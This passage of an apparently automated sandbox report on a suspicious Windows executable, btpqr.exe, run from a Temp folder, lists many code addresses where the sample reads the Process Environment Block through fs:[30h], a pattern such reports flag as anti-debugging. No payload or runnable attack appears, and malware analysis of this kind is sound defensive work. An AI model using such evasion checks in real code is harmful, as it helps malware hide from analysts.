            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C10115 mov eax, dword ptr fs:[00000030h]4_2_00C10115
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56154 mov eax, dword ptr fs:[00000030h]4_2_00B56154
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56154 mov eax, dword ptr fs:[00000030h]4_2_00B56154
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C156 mov eax, dword ptr fs:[00000030h]4_2_00B4C156
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE8158 mov eax, dword ptr fs:[00000030h]4_2_00BE8158
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov ecx, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C262D6 mov eax, dword ptr fs:[00000030h]4_2_00C262D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602A0 mov eax, dword ptr fs:[00000030h]4_2_00B602A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602A0 mov eax, dword ptr fs:[00000030h]4_2_00B602A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov ecx, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E284 mov eax, dword ptr fs:[00000030h]4_2_00B8E284
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E284 mov eax, dword ptr fs:[00000030h]4_2_00B8E284
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0283 mov eax, dword ptr fs:[00000030h]4_2_00BD0283
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0283 mov eax, dword ptr fs:[00000030h]4_2_00BD0283
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0283 mov eax, dword ptr fs:[00000030h]4_2_00BD0283
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602E1 mov eax, dword ptr fs:[00000030h]4_2_00B602E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602E1 mov eax, dword ptr fs:[00000030h]4_2_00B602E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602E1 mov eax, dword ptr fs:[00000030h]4_2_00B602E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4823B mov eax, dword ptr fs:[00000030h]4_2_00B4823B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A250 mov eax, dword ptr fs:[00000030h]4_2_00C0A250
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A250 mov eax, dword ptr fs:[00000030h]4_2_00C0A250
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C2625D mov eax, dword ptr fs:[00000030h]4_2_00C2625D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54260 mov eax, dword ptr fs:[00000030h]4_2_00B54260
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54260 mov eax, dword ptr fs:[00000030h]4_2_00B54260
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54260 mov eax, dword ptr fs:[00000030h]4_2_00B54260
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4826B mov eax, dword ptr fs:[00000030h]4_2_00B4826B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A250 mov eax, dword ptr fs:[00000030h]4_2_00B4A250
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56259 mov eax, dword ptr fs:[00000030h]4_2_00B56259
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD8243 mov eax, dword ptr fs:[00000030h]4_2_00BD8243
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD8243 mov ecx, dword ptr fs:[00000030h]4_2_00BD8243
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0C3CD mov eax, dword ptr fs:[00000030h]4_2_00C0C3CD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48397 mov eax, dword ptr fs:[00000030h]4_2_00B48397
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48397 mov eax, dword ptr fs:[00000030h]4_2_00B48397
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48397 mov eax, dword ptr fs:[00000030h]4_2_00B48397
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7438F mov eax, dword ptr fs:[00000030h]4_2_00B7438F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7438F mov eax, dword ptr fs:[00000030h]4_2_00B7438F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E388 mov eax, dword ptr fs:[00000030h]4_2_00B4E388
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E388 mov eax, dword ptr fs:[00000030h]4_2_00B4E388
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E388 mov eax, dword ptr fs:[00000030h]4_2_00B4E388
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F0 mov eax, dword ptr fs:[00000030h]4_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F0 mov eax, dword ptr fs:[00000030h]4_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F0 mov eax, dword ptr fs:[00000030h]4_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B863FF mov eax, dword ptr fs:[00000030h]4_2_00B863FF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov eax, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov eax, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov ecx, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov eax, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF43D4 mov eax, dword ptr fs:[00000030h]4_2_00BF43D4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF43D4 mov eax, dword ptr fs:[00000030h]4_2_00BF43D4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD63C0 mov eax, dword ptr fs:[00000030h]4_2_00BD63C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C2634F mov eax, dword ptr fs:[00000030h]4_2_00C2634F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1A352 mov eax, dword ptr fs:[00000030h]4_2_00C1A352
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C310 mov ecx, dword ptr fs:[00000030h]4_2_00B4C310
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B70310 mov ecx, dword ptr fs:[00000030h]4_2_00B70310
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A30B mov eax, dword ptr fs:[00000030h]4_2_00B8A30B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A30B mov eax, dword ptr fs:[00000030h]4_2_00B8A30B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A30B mov eax, dword ptr fs:[00000030h]4_2_00B8A30B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF437C mov eax, dword ptr fs:[00000030h]4_2_00BF437C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov ecx, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov eax, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov ecx, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov eax, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov eax, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF8350 mov ecx, dword ptr fs:[00000030h]4_2_00BF8350
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B844B0 mov ecx, dword ptr fs:[00000030h]4_2_00B844B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDA4B0 mov eax, dword ptr fs:[00000030h]4_2_00BDA4B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B564AB mov eax, dword ptr fs:[00000030h]4_2_00B564AB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B504E5 mov ecx, dword ptr fs:[00000030h]4_2_00B504E5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A49A mov eax, dword ptr fs:[00000030h]4_2_00C0A49A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A430 mov eax, dword ptr fs:[00000030h]4_2_00B8A430
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C427 mov eax, dword ptr fs:[00000030h]4_2_00B4C427
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E420 mov eax, dword ptr fs:[00000030h]4_2_00B4E420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E420 mov eax, dword ptr fs:[00000030h]4_2_00B4E420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E420 mov eax, dword ptr fs:[00000030h]4_2_00B4E420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A456 mov eax, dword ptr fs:[00000030h]4_2_00C0A456
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88402 mov eax, dword ptr fs:[00000030h]4_2_00B88402
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88402 mov eax, dword ptr fs:[00000030h]4_2_00B88402
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88402 mov eax, dword ptr fs:[00000030h]4_2_00B88402
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7A470 mov eax, dword ptr fs:[00000030h]4_2_00B7A470
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7A470 mov eax, dword ptr fs:[00000030h]4_2_00B7A470
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7A470 mov eax, dword ptr fs:[00000030h]4_2_00B7A470
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDC460 mov ecx, dword ptr fs:[00000030h]4_2_00BDC460
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4645D mov eax, dword ptr fs:[00000030h]4_2_00B4645D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7245A mov eax, dword ptr fs:[00000030h]4_2_00B7245A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B745B1 mov eax, dword ptr fs:[00000030h]4_2_00B745B1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B745B1 mov eax, dword ptr fs:[00000030h]4_2_00B745B1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD05A7 mov eax, dword ptr fs:[00000030h]4_2_00BD05A7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD05A7 mov eax, dword ptr fs:[00000030h]4_2_00BD05A7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD05A7 mov eax, dword ptr fs:[00000030h]4_2_00BD05A7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E59C mov eax, dword ptr fs:[00000030h]4_2_00B8E59C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B84588 mov eax, dword ptr fs:[00000030h]4_2_00B84588
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52582 mov eax, dword ptr fs:[00000030h]4_2_00B52582
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52582 mov ecx, dword ptr fs:[00000030h]4_2_00B52582
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B525E0 mov eax, dword ptr fs:[00000030h]4_2_00B525E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C5ED mov eax, dword ptr fs:[00000030h]4_2_00B8C5ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C5ED mov eax, dword ptr fs:[00000030h]4_2_00B8C5ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B565D0 mov eax, dword ptr fs:[00000030h]4_2_00B565D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A5D0 mov eax, dword ptr fs:[00000030h]4_2_00B8A5D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A5D0 mov eax, dword ptr fs:[00000030h]4_2_00B8A5D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E5CF mov eax, dword ptr fs:[00000030h]4_2_00B8E5CF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E5CF mov eax, dword ptr fs:[00000030h]4_2_00B8E5CF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60535 mov eax, dword ptr fs:[00000030h]4_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60535 mov eax, dword ptr fs:[00000030h]4_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60535 mov eax, dword ptr fs:[00000030h]4_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60535 mov eax, dword ptr fs:[00000030h]4_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60535 mov eax, dword ptr fs:[00000030h]4_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60535 mov eax, dword ptr fs:[00000030h]4_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E53E mov eax, dword ptr fs:[00000030h]4_2_00B7E53E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E53E mov eax, dword ptr fs:[00000030h]4_2_00B7E53E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E53E mov eax, dword ptr fs:[00000030h]4_2_00B7E53E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E53E mov eax, dword ptr fs:[00000030h]4_2_00B7E53E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E53E mov eax, dword ptr fs:[00000030h]4_2_00B7E53E
